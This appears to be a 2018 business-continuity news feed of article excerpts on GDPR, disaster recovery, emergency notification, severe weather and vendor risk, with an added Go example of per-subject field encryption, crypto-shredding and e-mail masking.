Congratulations! You’re one step closer to providing a secure and collaborative communication channel for your teams and community. Now comes the difficult part: determining what type of system is best for your specific needs, nailing down some finalists and making your purchase. This blog will walk you through what you need to consider before making a final decision, as well as how to present your case to gain internal buy-in for your recommendation and budget.

Consider These Features and Services

When you are purchasing a mass notification system, there are certain features and services that you will want to consider. Emergency notification systems (ENS) are complex, and you will find that there can be significant differences between systems. Features to keep in mind include:



Fintech Collaborations on the Rise

Fintech-bank partnerships result in growth opportunities. In this article, Krista Morgan examines the risk-reward relationship in this growing trend.

The strength of our banking system is that we trust it. That trust comes from knowing that banks follow rules designed to protect us. As consumers, we want to know that our money will be safe, our identities will be protected, and things will work the way we expect them to. We want all of that – but we also want a zero-hassle experience with our financial institutions that is incredibly fast and seamless.

Not an easy value proposition to deliver on. Banks need fintech firms to deliver experiences that today’s consumers expect. In fact, 89% of community banks believe bank and fintech collaborations will be common by 2027. At the same time, the banks need these fintech firms to maintain trust which, for better or worse, comes from regulatory compliance.



2018 may only have just begun, but it looks like a big year for information security. With questions being raised about the security of micro-processors, and major cyber security initiatives such as the EU’s General Data Protection Regulation brought into effect this year, a new edition of ISO/IEC 27000 has come at just the right time.

ISO/IEC 27000:2018 provides the overview of information security management systems (ISMS), and the terms and definitions commonly used in the ISO/IEC 27001 family of ISMS standards. Designed to be applicable to all types and sizes of organization, from multinational businesses to small and medium-sized enterprises, the new version, released in February 2018, is equally valuable to government agencies and not-for-profit organizations.

There are more than a dozen standards in the 27000 family. The recently published ISO/IEC 27000 provides an understanding of how the standards fit together: their scopes, roles, functions and relationship to each other.

The ISO/IEC 27001 community will find this standard useful, since it brings together all the essential terminology used by other standards in the ISO/IEC 27000 family.



Starting a career in technology is one way to ensure you’ll have to continually evolve. The technology transforming industries today might be obsolete tomorrow.

But while the technology changes, there are timeless ways to manage your career to ensure you rise to the top and stay at the forefront of what’s new.

We gathered insights and advice from six of our top executives on what they wished they knew when they were starting their careers and common mistakes they see recent graduates make. Their answers are a guide for any technology professional starting their journey.



The EU’s new General Data Protection Regulation (GDPR) sets forth a “lawful basis” for collecting and processing personal information. It will require most organizations to significantly improve data management and security, but most organizations are not ready to comply, especially with the requirement to demonstrate compliance. Fortunately, a company’s existing GRC tools, which are designed as central repositories for documenting and reporting on internal governance activities, can help organizations quickly implement the tracking processes necessary to demonstrate compliance.

Personal information is an increasingly valuable – and risky – business asset. Organizations want to collect as much personal information as possible to support better decision making and an improved customer experience. However, the fear of identity profiling, along with high-profile cyberattacks, has caused increasing concern about how to protect this information. The EU’s General Data Protection Regulation (GDPR), which goes into effect in May of this year, aims to add privacy protections for all individuals currently residing in the EU, whether they are citizens or not. It also impacts most organizations around the world that are collecting or processing data about EU residents, even if the organization does not have a physical presence in the EU.

The regulation sets forth a “lawful basis” for collecting and processing personal information and will require most organizations to significantly improve data management and security. Yet, according to multiple surveys, most organizations are not ready to comply, even though a compliance failure can be expensive, up to 4 percent of annual global turnover or €20 million, whichever is greater, and will likely result in damage to reputation and undesirable notoriety.

One of the trickiest areas of the regulation is that organizations must be able to demonstrate compliance. Think of it this way: a police officer typically needs to catch you speeding before giving you a ticket. But what if instead, you needed to prove that you had not sped during your entire drive? That’s the challenge of GDPR.



Have you ever had to bail out of an airplane?… Me neither, fortunately. But imagine if you did, and your parachute was too moth-eaten and tangled to support you because you hadn’t maintained it properly. Fun, right?

I see the same thing all the time with organizations’ recovery plans. The organization has a plan. They created it at some point in the past, and maybe at one time, it was actually pretty good. But that was a while ago, and they haven’t thought about it or looked at it recently. They’ve been too busy doing other things.

And then all of a sudden, there’s an emergency, and the organization realizes they need to implement their trusty old recovery plan in order to deal with the incident and minimize its impact on the business—but the plan is so moth-eaten it barely works.

Don’t let this happen to you.

In my experience, there are seven main ways in which recovery plans are commonly allowed to become out of date. Here they are; do any of them apply to you?



“Text Messaging Can Expose Your Company to Significant Risks”: In this article, Mike Pagani explains that texting is quick, easy, reliable and efficient — but if it’s used for official business communications, it can create tremendous risk for a company. Organizations of all sizes need to put the right policies in place, and implement automated text archiving and supervision systems as soon as possible—before it’s too late.

Texting is simple, concise and supported by virtually every mobile device, operating system and wireless carrier. This makes it the go-to way for employees to communicate with their colleagues, customers, or prospects in a time-crunched, always-connected society.

Ungoverned Text Messaging is a Growing Concern

Even though texting is quick, easy, reliable and efficient — if it’s used for official business communications, it can create tremendous risk for a company. When you consider the countless regulatory, legal and general risk and brand management challenges that companies must manage today, you might think email and other “official” communications using social media accounts and corporate websites are the only content types that need to be archived or actively supervised. Although its use by employees for official company business is often prohibited by organizations, the reality is text messaging does get used and therefore should be governed the same way as all other channels. Sending text messages between mobile devices is now one of the key ways that employees connect with each other and customers, and these records need to be maintained for completeness.

Compliance, legal, IT and risk and reputation professionals across a variety of litigious and regulated industries are now realizing that proactively automating the archiving and supervising of text messages is necessary to mitigate the myriad of potential risks arising from their records retention and oversight practices not keeping pace as employee use increases. Text messaging without proper governance is a major gap that can no longer be ignored.



Everyone knows that natural disasters aren’t spread evenly across the United States; rather, they occur in the same places year after year.

This fact was given striking visualization in a recent New York Times article called “The Places in the U.S. Where Disaster Strikes Again and Again.”

The article and accompanying maps are well worth checking out, especially for anyone involved in business continuity and disaster recovery.

The article was based on an analysis of data from the Small Business Administration from between 2002 and 2017. It looks at places in the U.S. where businesses applied for loans to rebuild following natural disasters. However, the data provides a reliable window into where disasters cause the most damage overall.

As it turns out, the same tiny portion of the country is responsible for the vast majority of disaster losses year after year.



2017 was a highlight reel of worst-case scenarios. WannaCry forced some organizations to play tug o’ war with their own data, while hurricanes halted business operations across the South. It felt like one terrible catastrophe after another, and while many organizations had effective safeguards in place, some did not. For those businesses who were unprepared, the series of disasters was a harsh wake-up call.

So what’s the state of disaster recovery (DR) today? A recent survey of 375 U.S. business leaders shows exactly how organizations are approaching their DR plans post-2017.

These disasters definitely left their mark: 33 percent of respondents said they aren’t confident in their business’s ability to overcome a disaster, and 57 percent said they would reconsider their existing DR plans or consider implementing a new one as a result of 2017’s massive hurricanes.



Do you remember when the first cell phones were commercially available?

One of the highest advertised benefits of mobile devices was the ability for travelers to contact help in the case of a roadside emergency. Today, cell phones have evolved into smartphones, and 95 percent of Americans have some form of mobile device. By utilizing a mobile notification system for alerting your staff who are traveling or are remote employees, you can protect and inform them easily in the event of an emergency.

Weather Alerts

From hurricanes and tornadoes to hail storms and wildfires, inclement weather is always right around the corner. Staying in touch with employees during storms is vital for many reasons. Start with weather alerts and warnings. Your primary duty is to protect staff while on the road, whether they’re traveling abroad or en route to work at a local office.

Using notification technology allows your company to contact all employees who are traveling. Consider a system that has two-way communication. This allows employees to share first-hand information about weather conditions, and to connect with you in case of an emergency.



(TNS) - On the Big Island of Hawaii, the ongoing eruption of Kilauea volcano is giving residents a lesson in what it's like to live on the flanks of an active volcano.

Fissures oozing lava won't be opening up in southcentral Alaska anytime soon. But the region around Alaska's biggest city is hardly a stranger to volcanic eruptions and the mayhem they can cause.

Our closest neighbor volcanoes have an explosive, active history. Mount Iliamna, Augustine Volcano, Mount Redoubt and Mount Spurr "have done some really bad things," said Chris Waythomas, a research geologist with the Alaska Volcano Observatory in Anchorage.

Over the past 60 years alone, Anchorage and Southcentral Alaska have been repeatedly dusted by ash from erupting volcanoes strung down the western side of Cook Inlet. Ash from exploding volcanoes has shut down airports, fouled car engines and machinery, and sent residents stocking up on air filters and face masks, most recently when Redoubt erupted in March 2009.



(TNS) - Residents, merchants and officials in Ellicott City on Monday began to examine the devastation wrought by the floods that coursed through the historic mill town the night before, for the second time in less than two years.

Old Ellicott City’s Main Street remained blocked off Monday as crews inspected buildings. Police were searching for a Maryland National Guardsman who was reported missing during the flooding Sunday. Cars lay on their sides or upside down in streams and along the road. A crane tow truck was brought in to lift them out. Utility workers began to restore power, fix a broken water line and bypass a broken sewer pipe.

Amid the immediate recovery efforts on Monday, the question was inescapable: Should Ellicott City, founded in 1772, devastated by floods in 2016 and now again in 2018, try to rebuild again?



As the GDPR comes into effect, many marketers are scrambling to align their online marketing strategies with the regulation. Unfortunately, like most regulations, it has many requirements that are confusing or ambiguous; one of those is how to treat the practice of requiring visitors to provide their contact information to receive access to restricted (gated) content, such as white papers and research.

What Does the Regulation Say?

Article 7 of the regulation sets the conditions for consent, and it is clear when it comes to collecting personal information from EU residents: consent must be clearly given for the processing of personal data, the data subject must be told how the information will be used, and withdrawing consent, which the data subject may do at any time, must be as easy as giving it.



Tuesday, 29 May 2018 14:58

GDPR: The End of Gated Content?

In this article, Wendy Wysong, Peter Coney and Tatsuhiko Kamiyama examine three key governance reforms coming from Japanese legislators and what global companies need to know going forward.

‘Japan Inc’ is now back on the front pages with many Japanese corporations increasingly pursuing significant M&A opportunities internationally given the mature market at home and high levels of cash reserves.

The corporate landscape in Japan has, however, also been changing in other, less headline-grabbing ways in recent years. As a consequence of a number of high-profile corporate scandals, Japanese legislators have been busy tweaking their legislative settings to further improve corporate governance in the world’s third biggest economy.

This article focuses on three such reforms:

  • the bolstering of the role of independent outside directors;
  • the introduction of Japan’s first ever plea-bargaining regime; and
  • the release of Japan’s ‘Principles for Listed Companies Dealing with Corporate Malfeasance’.

For the reasons explained below, global companies with operations in Japan should keep in mind this shift towards more regulation in Japan.



Today’s emergency alert systems need to be reliable and accurate.

In the wake of the terrifying January 2018 false alert to Hawaii residents, the public expects its emergency alert systems to operate consistently and properly.

The crux of general public notification systems in the United States is the Integrated Public Alert and Warning System (IPAWS). The system was developed to alert the public across multiple channels — radio, television, wireless devices, and other communication platforms. It is supposed to be deployed when there is an emergency that threatens life and property. It is often used to alert the public to a missing child but can also be used to alert about impending natural disasters or man-made incidents such as a chemical spill.



Some disasters are more likely to strike than others. If your business is based in Minnesota, you probably don’t have to worry about hurricanes. If you’re based in Florida, preparing for blizzards probably isn’t high on your list of priorities.

But no matter where you’re based, you should be prepared for flooding.

In recent years, we’ve seen flooding devastate everywhere from Hawaii to California to Texas to Tennessee to New Jersey, and beyond. Any business near the coast, a river, or in a low-lying area should have a plan in place to minimize any disruptions flooding might cause.

As your business braces for potential impacts, you should obviously rely on your DR plan, but there are several actions that the most resilient businesses take both before and after flooding that are worth calling out specifically.

If you experience flooding in your area, here’s what you should be doing.



Researchers predict we’re in store for another rough hurricane season. If previous years have taught us anything, it’s that these storms can quickly evolve in ways we can’t anticipate. You may not be able to control when or where a storm hits, but you can ensure your business is ready when it happens.

We put together a quick guide to help you prepare your business for hurricane season, particularly if you work in a coastal area. Effective hurricane preparation keeps your people safe and your business running, and limits the danger to, and losses for, your entire organization.



Friday, 25 May 2018 14:31


I don’t know if business continuity management software is the best thing since sliced bread, but it is pretty terrific stuff, in my opinion.

Of course, for BCM software to live up to its potential, a few important criteria must be met, in terms of the suitability of the software chosen, the attitude of the people administering it, and the characteristics of the organization (I’ll go into all that in more detail in the second part of the post).

But generally speaking, if you are a business continuity professional, I think that using BCM software—for business continuity planning, BIAs, metrics, and compliance—can change your life for the better. More to the point, it can change the BC program at your organization for the better, increasing its resiliency and boosting its ability to recover from a disruption.



Data encryption and data masking are important tools for providing the data protection and data privacy the GDPR mandates. With careful key management, encryption is a powerful addition to your arsenal of GDPR best practices: end-to-end encryption protects data in your on-premises data centers as well as in your cloud-based applications and data stores. Data masking is an important adjunct technology. Together, encryption and data masking give you the flexibility to meet a broad mix of GDPR data security needs in support of your EU customers.

The EU General Data Protection Regulation (GDPR), Regulation (EU) 2016/679, was adopted in April 2016 and goes into effect this month, on May 25, 2018. On that date it replaces the Data Protection Directive 95/46/EC.

The GDPR gives individuals in the EU (data subjects) much more control over the data that regulated entities can acquire, store and use. These regulated entities include controllers, which decide the purposes and means of processing and give specific direction to processors, and processors, which process personal data on behalf of a controller. Both controllers and processors have direct compliance obligations under the GDPR. The regulation requires that companies obtain explicit permission to process personal data simply and clearly, and that data subjects can withdraw that consent just as easily at any time. Personal data covers just about anything that can be used to identify an individual uniquely.

The GDPR is broad in scope. It applies to any entity that offers goods or services to individuals in the EU, and to any service that monitors the behavior, online or otherwise, of individuals within the EU. In practice, it applies to just about any business, anywhere on the globe, that conducts transactions with a user in the EU.
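The encryption, key management and masking techniques this piece names, as an added example that is not the page's own code nor any vendor's product: a hypothetical in-memory PrivacyVault written in Go with only the standard library. It encrypts individual fields with AES-256-GCM under a separate data-encryption key per data subject, binds the subject ID into the authenticated data so a record cannot be quietly re-attributed, statically masks e-mail addresses for display or test data, and shows how destroying a subject's key ("crypto-shredding") makes every record encrypted under it unrecoverable, which is one way to act on withdrawn consent or an erasure request. The type and function names, the subject IDs and the sample phone number are all invented for this example; a real deployment would keep the keys in a KMS or HSM rather than a map.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"strings"
)

// PrivacyVault is a hypothetical in-memory key store for this example: one random
// AES-256 data-encryption key (DEK) per data subject. Production keeps DEKs in a KMS/HSM.
type PrivacyVault struct {
	keys map[string][]byte // subject ID -> 32-byte DEK
}

func NewPrivacyVault() *PrivacyVault { return &PrivacyVault{keys: map[string][]byte{}} }

// aeadFor builds an AES-GCM AEAD from a raw 32-byte key.
func aeadFor(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptField seals one field under the subject's DEK as nonce || ciphertext || tag.
// The subject ID is bound as additional authenticated data, so a stored record
// cannot be quietly re-attributed to a different subject.
func (v *PrivacyVault) EncryptField(subject string, plaintext []byte) ([]byte, error) {
	key, ok := v.keys[subject]
	if !ok { // first field for this subject: mint a fresh DEK
		key = make([]byte, 32)
		if _, err := rand.Read(key); err != nil {
			return nil, err
		}
		v.keys[subject] = key
	}
	gcm, err := aeadFor(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize()) // fresh random nonce per field
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, []byte(subject)), nil
}

// DecryptField reverses EncryptField. It fails if the DEK has been shredded,
// the ciphertext was tampered with, or the subject ID does not match.
func (v *PrivacyVault) DecryptField(subject string, sealed []byte) ([]byte, error) {
	key, ok := v.keys[subject]
	if !ok {
		return nil, errors.New("no key for subject: data is unrecoverable")
	}
	gcm, err := aeadFor(key)
	if err != nil {
		return nil, err
	}
	if len(sealed) < gcm.NonceSize() {
		return nil, errors.New("ciphertext too short")
	}
	return gcm.Open(nil, sealed[:gcm.NonceSize()], sealed[gcm.NonceSize():], []byte(subject))
}

// Shred deletes the subject's DEK ("crypto-shredding"): every field encrypted under
// it becomes unrecoverable. Returns false if the subject had no key to delete.
func (v *PrivacyVault) Shred(subject string) bool {
	_, ok := v.keys[subject]
	delete(v.keys, subject)
	return ok
}

// MaskEmail is static masking for display or test data: keep the first and last
// character of the local part plus the whole domain ("alice@example.com" ->
// "a***e@example.com"); local parts of 1-2 characters or inputs without "@" are masked fully.
func MaskEmail(email string) string {
	at := strings.LastIndex(email, "@")
	if at <= 0 {
		return "***"
	}
	local, domain := email[:at], email[at:]
	if len(local) <= 2 {
		return "***" + domain
	}
	return local[:1] + "***" + local[len(local)-1:] + domain
}

func main() {
	v := NewPrivacyVault()
	sealed, _ := v.EncryptField("subject-42", []byte("+44 20 7946 0000")) // constructed sample value
	v.Shred("subject-42")
	_, err := v.DecryptField("subject-42", sealed)
	fmt.Println(MaskEmail("alice@example.com"), "after shred:", err)
}
```

The per-subject key is what makes erasure cheap: records can stay in backups and logs, but once the key is gone they are ciphertext with no owner. Masking is the complement for data that must still be readable by humans, such as support screens or test databases, where the raw value is not needed at all.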



(TNS) - Officials at Crosby's Arkema chemical plant were warned that the facility was at risk for flooding a year before Hurricane Harvey's deluge resulted in a chemical fire at the plant.

But facility employees, with the exception of a manager who left in early 2017, "appeared to be unaware of this information," an inquiry by the U.S. Chemical Safety And Hazard Investigation Board found.

The board concluded that Arkema, a French multinational company that manufactures chemicals used to create plastic products, was not prepared for flooding of this magnitude. During Harvey, 6 feet of water wiped out the facility's power and backup generators. With the power out and cooling systems failing, volatile organic peroxides exploded multiple times over the course of a week, producing towering pillars of fire and thick plumes of black smoke.

The board, an independent federal agency that investigates industrial chemical accidents, released a 154-page report Thursday morning detailing its findings.



In just a few days, on May 25, the clock will expire on the two-year transition period for companies to reach compliance with the General Data Protection Regulation (GDPR). This impacts not only organizations operating in the European Union (EU), but also companies in the United States and elsewhere that handle the personal data of anyone who resides in the EU. Those who fail to comply with the GDPR rules on personal data, contact data included, face fines of up to €20 million (about $24 million) or 4 percent of global annual turnover, whichever is higher.

GDPR has been billed as “data protection on steroids,” and with just a few days to go, 83 percent of all companies subject to the law lack confidence they’ll be able to meet the deadline. Based on my own recent discussions with various European channel partners (companies that partner with a manufacturer or producer to market and sell the manufacturer’s products, services, or technologies), only about half, within the UK, said they had completed their preparations and fully tested their compliance with GDPR.



The founder and President of Safety Projects International Inc. has a mission: to help clean up the U.S., Canada, and several other countries. However, rather than doing it himself, Dr. Bill Pomfret, aka Dr. Clean, is getting the workers themselves to do it, which is simple in its logic but offers a huge challenge in its execution.

"The state of cleanliness affects us in every aspect of our everyday lives, whether we're a patient in a hospital, a pupil in school, a customer in a restaurant or an employee in the workplace," Dr. Bill says.

"But most people fail to realize that cleaning is a science." Treatment of the cause, not the symptoms, coupled with a healthy dose of preventive medicine, is his prescription for the endemic problem faced by most countries that he visits. First, that means completely breaking down the tolerance for filth and replacing it with a culture of cleanliness.

And second, people will have to be educated on the best ways to clean up and to stay clean. Dr. Bill is well aware of the big, big job that is cut out for him, and that it involves more than just trying to change people's attitude or mindset. That is but a starting point, even though it is a massive challenge in itself, as evidenced by the limited success of the numerous public cleanliness campaigns undertaken in many countries so far, including South Africa, the Philippines and Malaysia to name a few.

There is no question that 72-year-old Dr. Bill is committed to his cause. He has, after all, got a 40-year-old lucrative business. But to him, raising most countries' standards of cleanliness is part and parcel of occupational health and safety, both curative and preventive. Five years ago, he set up the education and training Center for Cleaning Science and Technology (CCST) in the Philippines, the country's first such facility.

Located in San Isidro, Nueva Ecija, the center conducts, inter alia, training programs for the cleaning service industry, as well as for local councils, building owners and property managers, with the primary objective of raising the status and standards of the Philippines' cleaning industry. After all, like Puerto Rico for the U.S.A., the number one export from the Philippines is its people, mostly as live-in caregivers. The Open University’s Institute of Professional Development accredits the center’s cleaning proficiency program. Before setting up the facility, Dr Pomfret had personally audited and surveyed the way cleaning operators normally worked. Some of his findings proved shocking. For example, the same mop was used to clean the toilet and the kitchen; the same rag to clean the bathroom and to wipe tables in eateries; and the same pail of filthy water to mop corridor after corridor.

His conclusion was that many contract cleaners, not only in the Philippines but internationally, were simply clueless about cleaning.

Mostly, the exercise seemed to be aimed not at actually cleaning but at creating the impression that cleaning had been done, that is, not to sanitize but to look clean.

"The thing is you have to clean right," Dr Pomfret stresses. "You may not be able to control the public entirely but you can control the cleaners and the quality of cleaning." During his travels, he had also visited Singapore's Institute of Cleaning Sciences, a franchise of the British Institute of Cleaning Sciences. Graduates, and professional cleaners are required to sit a proficiency test, both theory and practical.

In most countries, it is important that building owners, property managers and local councils send their staff for formal, practical training, Dr. Pomfret adds. This is because there are today very wide ranges of cleaning machines designed for all kinds of functions. Then there are the chemicals, which must be handled properly. In addition, cleaning processes can be quite job-specific, be it the cleaning of air ducts, treatment and prevention of graffiti, maintenance of various types of surfaces or basics like chewing gum removal.

For cleaning companies, such training makes economic sense, too. For instance, without this knowledge, they will not be able to devise a realistic price structure on which to negotiate a cleaning contract. As for prospective clients, most will recognize that it is best to go with a professional outfit to minimize the risk of ending up with a whopping bill for restoration work after a botched job.

"Lack of know-how among property managers is the primary cause of poor maintenance of buildings," says Dr Pomfret. "They get incompetent cleaners and these people destroy the properties.

So the management has to cough up money to do yearly restoration and refurbishing." Business owner Bill Thompson agrees. "The notion that a mop and bucket is all you need to clean is archaic.”

In most developed countries, cleaning has become a highly professional field. In fact, the 'First World Facility, Third World Mentality' complaint from visitors regarding the U.A.E. amenities can be attributed to the fact that cleaning as a process has been hugely neglected.

"The industry must become professional in the shortest time possible. As a matter of urgency, a body comprising the Government, local and city councils, training schools, suppliers, contractors and other stakeholders should be set up to draw up minimum standards," Pomfret says. Some 20 years ago, I helped develop the 5 Star Health and Safety Management System™; the first part I concentrated on was housekeeping, “Cleanliness and Order”, which gives the employer the biggest bang for the buck.

Arguing that governments should be more receptive and exposed to the cleaning service industry, Pomfret, whose company has been in the health and safety business for over 50 years, says: "Right now, it's a free-for-all. Unless standards are imposed and cleaning contractors are certified and classified, many countries will continue to be plagued by poor maintenance and dirty surroundings." Dr Pomfret may remind one of a young Don Aslett, the author of numerous books on cleaning techniques and self-styled No. 1 cleaner in America, but all he dreams of is a day when no person would fear to walk into a public toilet in any country he has trained.

Meanwhile, Dr. Clean as he is known has trained staff from many companies in the Philippines and the U.A.E. South Africa and elsewhere. The going has been tough, still is, principally because of the need for him to relentlessly prod and irritate people into action, even just to see the urgency of the matter. On the positive side, he can be likened to a grain of sand in an oyster, which will one day become a pearl – and be appreciated.

DR CLEAN'S DIAGNOSIS INDUSTRY MUST BE RATIONALISED: Nobody can tell for sure about something as basic as the size of the industry. There are so many players but numbers don't guarantee quality. And there are no proper guidelines to qualify cleaning enterprises for bids to undertake a cleaning and building maintenance job.

Without guidelines on such things as a company's manpower, technological and management capacity as well as know-how, anyone with minimal or zero knowledge can bid for contracts. Unlike in the construction industry where contractors are graded, there is no classification of cleaners based on professional competence.

THE CLEANERS, THEY MUST BUCK UP: Cleaning know-how and cleaning product knowledge are not fully pursued by cleaners. Unlike the UK and Singapore, which impose practical and theory tests on would-be cleaning operatives (questions range from which chemical to use on which type of surface to which color pad to use on which scrubber machine for which function), the cleaning service industry in most Western countries operates on the basis of “even my grandmother can do that job”.

WHAT STANDARD? There are no established standards for cleanliness.

Lack of education on the part of the authorities (such as local councils), building owners, property managers and employers, as well as the cleaners themselves, is a major obstacle to the much-needed professionalisation of the industry. "Our architectural and engineering ability has reached the point where we can build the world's tallest buildings, but our cleaning and maintenance ability has lagged far behind."

WHAT BENCHMARK? There is no benchmark for players to strive to match and maybe exceed, with a view to promoting the development of the international cleaning service industry to the level where it can compete in the international market and export cleaning services. "The Government should nurture the industry so that it will reach that level."

Dr Bill Pomfret, MSc, FIOSH, RSP, can be contacted at 26 Drysdale Street, Kanata, Ontario, K2K 3L3. Tel: 613-254-9233; website: www.spi5star.com.

Thursday, 24 May 2018 20:14

The Importance of Professional Cleaning

Community bank strengthens enterprise-wide business continuity program and vendor risk management capabilities

With 53 branches, multiple ATMs, and banking seven days a week at two locations, TBK Bank strives to do the right thing to make customers’ lives better and easier.

Now, the bank has done the right thing for its customers by doing the right thing for its business continuity program, moving in just six months from a legacy planning tool to a data-centric business continuity management program built on the Fusion Framework® System™.  

The power of the solution creates synergies that allow the business continuity program to continue to grow and mature, taking on high priorities that were previously out of scope such as vendor risk management. This has significantly improved TBK Bank’s risk profile, with the end result being a greater ability to deliver great customer service at all times under any circumstances.

TBK Bank’s ongoing success has been accelerated with a regular infusion of Fusion’s creative Fuel offering and by connecting with the Fusion Community where best practices and new ideas are openly shared.

Making Business Continuity Holistic and Actionable

TBK Bank recognizes the criticality of being always available for its customers. When the time came to move away from the lightweight legacy product the bank used for its business continuity program, Deb Wagamon, Business Continuity Manager at TBK Bank, examined the options in the marketplace. One of the vendors she contacted was Fusion Risk Management.

Wagamon explained why Fusion piqued her interest: “The first thing that impressed me was the fact that they were extremely interested in what I was doing and what my hindrances were and how they could help us. They didn’t start out like a normal vendor with ‘I can sell you this. This is what we can do for you.’ That told me I had a partner, rather than just a vendor trying to get money out of my company.”

Fusion rose to the top of the potential vendors because of the opportunity Wagamon had to try out the system. “They gave me a month trial period where I could enter my program’s data into the system and test it,” stated Wagamon. “Other vendors were offering much shorter trial periods – only a few days to a week. Plus, not only did Fusion allow me the sandbox to test in, but I was able to bounce questions off of Fusion personnel while I was doing it. Even before I was a customer, it was like I had a whole team helping bring my vision to life using the Fusion Framework System.”

Recognizing that Fusion would make TBK Bank’s future business continuity goals possible in ways other vendors could not match, Wagamon committed to the Fusion Framework System.

The system brought together all of TBK Bank’s business continuity plans into one accessible and actionable location. Vulnerabilities and gaps were identified and remediated. Such a transformation would typically take years via a traditional approach, however, the Fusion Framework and its flexible, information-based approach and robust plan management infrastructure enabled the TBK Bank business continuity team to instill best practices in the program without starting from scratch. Wagamon affirmed, “It took me just six months to take my plan from ‘basic’ to ‘robust.’”

Managing Vendor Risk

TBK Bank worked with Fusion not only to leverage the Fusion Framework System for business continuity, but also to improve vendor risk management. Previously, Wagamon had vendor information in multiple places, so it was hard to manage, keep up to date, and pull together in the event of an audit. With over 350 vendors in play, she knew it was only a matter of time before something crucial was missed, with significant ramifications. “Trying to manage all the due diligence, contracts, and everything was becoming a nightmare. I had to get the vendor data into some kind of an automated tool,” explained Wagamon.

TBK Bank leveraged the flexibility and configurability of the Fusion Framework System to create a vendor management solution aligned with its specific needs. “I truly feel confident, because the Fusion Framework System handles everything. Processes are automated to eliminate human error. The system sends me an e-mail whenever I have to update insurance. If I’ve got a contract that’s coming up in 90 days, the business owner gets an e-mail saying, ‘Do you want to renew this or do you want to terminate?’ All I do now is manage.”

Plus, because the information foundation created by the Fusion Framework now contains comprehensive vendor data, the vendor risk management program is fully integrated with the business continuity program. This results in greater engagement of users and stronger end-to-end business continuity plans.

Fueling Further Success

To further the success of its business continuity program, TBK Bank took advantage of Fusion’s unique offering known as Fuel which pairs Wagamon’s group with an industry expert and a team of Fusion product experts. The team keeps TBK Bank’s program focused on the right priorities and provides expertise impossible to get from an internal resource. Wagamon noted, “This has been wonderful for me. I meet with an expert on a monthly basis and talk about my objectives for the next budget year, get help to resolve any issues I might have, and learn how to use the system to its fullest advantage.”

Additionally, Wagamon has benefited greatly from the knowledge sharing opportunities that are regularly available as a member of the Fusion community. Wagamon attends Fusion industry user groups, where she learns from her peers. She affirmed, “There’s always more to Fusion – it doesn’t matter how much you’re learning or how far you’ve come in the last two or three years, there’s just so much depth. The user groups are wonderful for allowing you to connect with the Fusion community, learn from fellow peers, and understand all the areas where Fusion can assist you.”

Wagamon has been thrilled to share her experience with others. “I’ve been able to sit down with someone who is as frustrated as I used to be and tell them my story,” she stated. “Normally, I don’t make a stand and speak out in public about vendors, but with Fusion, I do.”

Thursday, 24 May 2018 17:45

Business Continuity You Can Bank On

Many organizations use templates to help them craft their business continuity plans.

In our opinion, this is an excellent way of going about doing it.

The “good” of using templates is significant and will be sketched out below.

If there is an “ugly” part about using templates, it’s what happens when organizations mistake filling out a template with the thought and analysis that comes with actual planning.

That being said, we commonly see more problems when organizations don’t use templates as a guide or standard for their planning efforts.

A surprisingly large number of organizations forgo the convenience and support of templates for a cooking-from-scratch approach. Moreover, they frequently have lots of different cooks.

Such organizations commonly task different individuals from across the company with writing the recovery plans for their respective departments. You can imagine the results: A large collection of mismatched plans varying widely in quality, comprehensiveness, level of detail, organization, and formatting. Some of these plans are liable to be excellent and some barely adequate. Many will have significant gaps, and since there’s no companywide documentation standard, they will probably all be confusing to anyone from outside the department who has to use them in an emergency. Talk about ugly.

In terms of the “bad” aspects of using templates, there really aren’t many. However, there are some precautions you should keep in mind when using them, which we’ll spell out in a moment.



(TNS) - In the aftermath of the Santa Fe High School shooting last week, Central Texas school officials are reviewing safety plans and working to tighten security, including for upcoming graduation ceremonies.

Officials with several area school districts said this week they will continue to conduct drills, including for lockdown, lockout and evacuations. They said they’ll also work with local law enforcement agencies to check school emergency response plans. Some school districts are taking further steps by adding more security measures for graduation ceremonies, exploring ways to limit how people can enter campuses and training staff on responding to an active shooter.

Eight students and two teachers were killed in the Santa Fe shooting. The accused shooter is a student at the school.

“AISD police is prepared to respond in a crisis and regularly works with outside police and safety organizations to ensure we have plans in place,” said Cristina Nguyen, spokeswoman for the Austin school district. “We will continually review our protocols and look for ways to enhance safety in our community.”

Nguyen added that the Frank Erwin Center will require graduation attendees to carry clear bags this year; the policy also applies to Eanes and Pflugerville school districts’ high school graduations at the venue. The Hays school district is requiring passes for individuals to access the floor of the Texas State University’s Strahan Coliseum where graduation will be held. Officials at other school districts such as Bastrop will add more officers and plain-clothes personnel as needed.



On May 11-16 a series of wind, hail and rain storms struck most states east of the Rocky Mountains. Karen Clark & Co., a catastrophe modeling firm, estimates that the storms will cost insurers $2.5 billion.

Most of the damage occurred in the Midwest, Northeast and Mid-Atlantic regions. Karen Clark predicts that insured losses higher than $100 million will be seen in: Colorado, Connecticut, Illinois, Indiana, Iowa, Kansas, Maryland, Michigan, New York, Ohio, Pennsylvania and Virginia.

The weather system (referred to as a ‘ring of fire’) led to over 600,000 power outages in the Mid-Atlantic and Northeast states. Wind gusts over 58 miles per hour were reported, as well as hundreds of hail storms and 28 tornadoes.



The European Union's (EU) General Data Protection Regulation, or GDPR for short, places stringent new rules on how enterprises manage and secure user data. A key consideration for enterprise CISOs and their data security teams, GDPR can also have a major impact on a company's data storage environment and the management thereof. We have long known the GDPR is on the way; it finally goes into effect on Friday, May 25, 2018.

GDPR affects non-European enterprises, too

Don't think that GDPR applies to organizations located outside of the EU? Think again.

First off, being based outside of the EU doesn't immunize the company from the regulation's requirements. If an organization collects data belonging to European users, GDPR applies, regardless of which country its headquarters calls home.


